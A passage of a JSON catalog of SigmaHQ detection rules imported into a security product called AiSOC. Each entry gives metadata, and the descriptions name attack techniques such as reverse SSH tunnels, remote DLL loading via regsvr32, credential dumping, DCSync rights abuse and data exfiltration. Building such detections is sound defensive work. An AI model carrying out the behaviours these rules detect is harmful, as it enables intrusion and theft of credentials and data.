"rules/windows/builtin/windefend/win_defender_history_delete.yml" } }, { "id": "sigmahq-sigma-2b140a5c-dc02-4bb8-b6b1-8bdb45714cde", "type": "detection", "name": "System Control Panel Item Loaded From Uncommon Location", "description": "Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-control-panel-item-loaded-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2b140a5c-dc02-4bb8-b6b1-8bdb45714cde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_cpl_from_non_system_location.yml" } }, { "id": "sigmahq-sigma-2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "type": "detection", "name": "PwnDrp Access", "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1102.001", "T1102.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pwndrp-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_pwndrop.yml" } }, { "id": "sigmahq-sigma-2b669496-d215-47d8-bd9a-f4a45bf07cda", "type": "detection", "name": "Data Exfiltration to Unsanctioned Apps", "description": "Detects when Microsoft Cloud App Security reports that a user or IP address used an unsanctioned app to perform an activity that resembles an attempt to exfiltrate information from your organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-exfiltration-to-unsanctioned-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2b669496-d215-47d8-bd9a-f4a45bf07cda", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml" } }, { "id": "sigmahq-sigma-2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", "type": "detection", "name": "Account Lockout", "description": "Identifies a user account that has been locked because the user tried to sign in too many times with an incorrect user ID or password; repeated lockouts may indicate password-guessing or brute-force activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": 
false, "path": "detections/sigma-imports/_quarantine/account-lockout.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_account_lockout.yml" } }, { "id": "sigmahq-sigma-2bfb6216-0c31-4d20-8501-2629b29a3fa2", "type": "detection", "name": "FortiGate - New VPN SSL Web Portal Added", "description": "Detects the addition of a VPN SSL Web Portal on a Fortinet FortiGate Firewall.\nThis behavior was observed in pair with modification of VPN SSL settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-new-vpn-ssl-web-portal-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2bfb6216-0c31-4d20-8501-2629b29a3fa2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_vpn_ssl_web_portal.yml" } }, { "id": "sigmahq-sigma-2c03648b-e081-41a5-b9fb-7d854a915091", "type": "detection", "name": "Rclone Activity via Proxy", "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rclone-activity-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c03648b-e081-41a5-b9fb-7d854a915091", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_rclone.yml" } }, { "id": "sigmahq-sigma-2c1486f5-02e8-4f86-9099-b97f2da4ed77", "type": "detection", "name": "Insecure Proxy/DOH Transfer Via Curl.EXE", "description": "Detects execution of \"curl.exe\" with the \"insecure\" flag (which disables TLS certificate verification) in combination with a proxy or DNS-over-HTTPS (DOH) option.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/insecure-proxy-doh-transfer-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c1486f5-02e8-4f86-9099-b97f2da4ed77", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml" } }, { "id": "sigmahq-sigma-2c28c248-7f50-417a-9186-a85b223010ee", "type": "detection", "name": "Wscript Shell Run In CommandLine", "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious 
activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wscript-shell-run-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c28c248-7f50-417a-9186-a85b223010ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml" } }, { "id": "sigmahq-sigma-2c32b543-1058-4808-91c6-5b31b8bed6c5", "type": "detection", "name": "PUA - Crassus Execution", "description": "Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1590.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-crassus-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_crassus.yml" } }, { "id": "sigmahq-sigma-2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "type": "detection", "name": "Driver Load From A Temporary Directory", "description": 
"Detects a driver load from a temporary directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/driver-load-from-a-temporary-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_susp_temp_use.yml" } }, { "id": "sigmahq-sigma-2c95fa8a-8b8d-4787-afce-7117ceb8e3da", "type": "detection", "name": "Time Machine Backup Disabled Via Tmutil - MacOS", "description": "Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility \"tmutil\".\nAn attacker can use this to prevent backups from occurring.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/time-machine-backup-disabled-via-tmutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c95fa8a-8b8d-4787-afce-7117ceb8e3da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" } }, { "id": "sigmahq-sigma-2c99737c-585d-4431-b61a-c911d86ff32f", "type": "detection", "name": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", "description": "Detects the backdooring of a domain object by granting a regular user or machine account the extended rights associated with DCSync (for example via the PowerView \"Add-DomainObjectAcl\" cmdlet); an account holding these rights can replicate directory data and re-obtain the password hashes of any user or computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powerview-add-domainobjectacl-dcsync-ad-extend-right.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c99737c-585d-4431-b61a-c911d86ff32f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" } }, { "id": "sigmahq-sigma-2cf29f11-e356-4f61-98c0-1bdb9393d6da", "type": "detection", "name": "Renamed Visual Studio Code Tunnel Execution", "description": "Detects renamed Visual Studio Code tunnel execution. 
Attackers can abuse this functionality to establish a C2 channel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-visual-studio-code-tunnel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2cf29f11-e356-4f61-98c0-1bdb9393d6da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml" } }, { "id": "sigmahq-sigma-2d1b83e4-17c6-4896-a37b-29140b40a788", "type": "detection", "name": "Google Workspace User Granted Admin Privileges", "description": "Detects when an Google Workspace user is granted admin privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-user-granted-admin-privileges.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d1b83e4-17c6-4896-a37b-29140b40a788", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_user_granted_admin_privileges.yml" } }, { "id": 
"sigmahq-sigma-2d22a514-e024-4428-9dba-41505bd63a5b", "type": "detection", "name": "Indirect Command Execution From Script File Via Bash.EXE", "description": "Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.\nThis can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indirect-command-execution-from-script-file-via-bash-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d22a514-e024-4428-9dba-41505bd63a5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bash_file_execution.yml" } }, { "id": "sigmahq-sigma-2d2f44ff-4611-4778-a8fc-323a0e9850cc", "type": "detection", "name": "Inline Python Execution - Spawn Shell Via OS System Library", "description": "Detects execution of inline Python code via the \"-c\" in order to call the \"system\" function from the \"os\" library, and spawn a shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/inline-python-execution-spawn-shell-via-os-system-library.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 
the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d2f44ff-4611-4778-a8fc-323a0e9850cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_shell_os_system.yml" } }, { "id": "sigmahq-sigma-2d32dd6f-3196-4093-b9eb-1ad8ab088ca5", "type": "detection", "name": "Suspicious Response File Execution Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file with a non-\".rsp\" extension.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-response-file-execution-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d32dd6f-3196-4093-b9eb-1ad8ab088ca5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml" } }, { "id": "sigmahq-sigma-2d367498-5112-4ae5-a06a-96e7bc33a211", "type": "detection", "name": "Suspicious Binary Writes Via AnyDesk", "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-binary-writes-via-anydesk.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" } }, { "id": "sigmahq-sigma-2d3cdeec-c0db-45b4-aa86-082f7eb75701", "type": "detection", "name": "Microsoft IIS Service Account Password Dumped", "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-iis-service-account-password-dumped.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml" } }, { "id": 
"sigmahq-sigma-2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "type": "detection", "name": "NetSupport Manager Service Install", "description": "Detects NetSupport Manager service installation on the target system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netsupport-manager-service-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml" } }, { "id": "sigmahq-sigma-2d5e7a8b-f484-4a24-945d-7f0efd52eab0", "type": "detection", "name": "System Information Discovery Using Ioreg", "description": "Detects the use of \"ioreg\" which will show I/O Kit registry information.\nThis process is used for system information discovery.\nIt has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-using-ioreg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"2d5e7a8b-f484-4a24-945d-7f0efd52eab0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" } }, { "id": "sigmahq-sigma-2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f", "type": "detection", "name": "Potential SSH Tunnel Persistence Install Using A Scheduled Task", "description": "Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects task creations that call OpenSSH, which may indicate the creation of a reverse SSH tunnel to the attacker's server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ssh-tunnel-persistence-install-using-a-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_openssh_tunnelling.yml" } }, { "id": "sigmahq-sigma-2dad0cba-c62a-4a4f-949f-5f6ecd619769", "type": "detection", "name": "Split A File Into Pieces - Linux", "description": "Detects use of the command \"split\" to split files into parts for possible transfer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/split-a-file-into-pieces-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_split_file_into_pieces.yml" } }, { "id": "sigmahq-sigma-2db93a3f-3249-4f73-9e68-0e77a0f8ae7e", "type": "detection", "name": "Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server", "description": "Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line.\nThese parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.\nThis technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-tacticalrmm-agent-registration-to-potentially-attacker-contro.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2db93a3f-3249-4f73-9e68-0e77a0f8ae7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli.yml" } }, { "id": "sigmahq-sigma-2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "type": "detection", "name": "WebDav Client Execution Via Rundll32.EXE", "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like \"C:\\windows\\system32\\davclnt.dll,DavSetCookie\".\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webdav-client-execution-via-rundll32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml" } }, { "id": "sigmahq-sigma-2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "type": "detection", "name": "Potentially Suspicious Regsvr32 HTTP IP Pattern", "description": "Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-regsvr32-http-ip-pattern.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml" } }, { "id": "sigmahq-sigma-2ddef153-167b-4e89-86b6-757a9e65dcac", "type": "detection", "name": "File Download Via Bitsadmin To A Suspicious Target Folder", "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-bitsadmin-to-a-suspicious-target-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" } }, { "id": "sigmahq-sigma-2e4e488a-6164-4811-9ea1-f960c7359c40", "type": "detection", "name": "HackTool - CACTUSTORCH Remote Thread Creation", "description": "Detects remote thread creation from CACTUSTORCH as described in references.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.012", "T1059.005", "T1059.007", 
"T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-cactustorch-remote-thread-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml" } }, { "id": "sigmahq-sigma-2e65275c-8288-4ab4-aeb7-6274f58b6b20", "type": "detection", "name": "Procdump Execution", "description": "Detects usage of the SysInternals Procdump utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/procdump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml" } }, { "id": "sigmahq-sigma-2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", "type": "detection", "name": "Activity Performed by Terminated User", "description": "Detects when Microsoft Cloud App Security reports users whose account was terminated in Azure AD but who still perform activities in other platforms such as AWS or 
